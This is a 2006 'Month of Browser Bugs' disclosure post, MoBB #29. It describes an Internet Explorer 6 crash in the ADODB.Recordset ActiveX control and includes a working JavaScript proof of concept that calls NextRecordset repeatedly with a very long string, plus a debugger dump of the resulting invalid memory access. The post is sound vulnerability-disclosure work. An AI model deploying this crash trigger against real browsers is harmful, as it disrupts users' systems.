Saturday, July 29, 2006

MoBB #29: ADODB.Recordset NextRecordset

The following bug was tested on the latest version of Internet Explorer 6 on a fully-patched Windows XP SP2 system. Calling the NextRecordset method repeatedly with a long string can result in an invalid memory access inside the SysFreeString function. This bug is similar to MoBB #8 and MoBB #21.

// Instantiate the ADODB.Recordset control
var a = new ActiveXObject('ADODB.Recordset');
// Build a string of just over 512 KB by repeated doubling
var b = 'XXXX';
while (b.length <= 1024*512) b+=b;
// Call NextRecordset repeatedly with the long string, ignoring script errors
for (var i = 0; i < 32768; i++) try { a.NextRecordset(b); } catch(e) {}

Demonstration

eax=00181358 ebx=0013b1c4 ecx=00000007
edx=0000400c esi=02d30020 edi=00000008
eip=77124874 esp=0013ae68 ebp=0013ae6c
OLEAUT32!SysFreeString+0x45:
77124874 8b0e mov ecx,[esi] ds:0023:02d30020=???

This bug will be added to the OSVDB:
Microsoft IE ADODB.Recordset SysFreeString Invalid Length
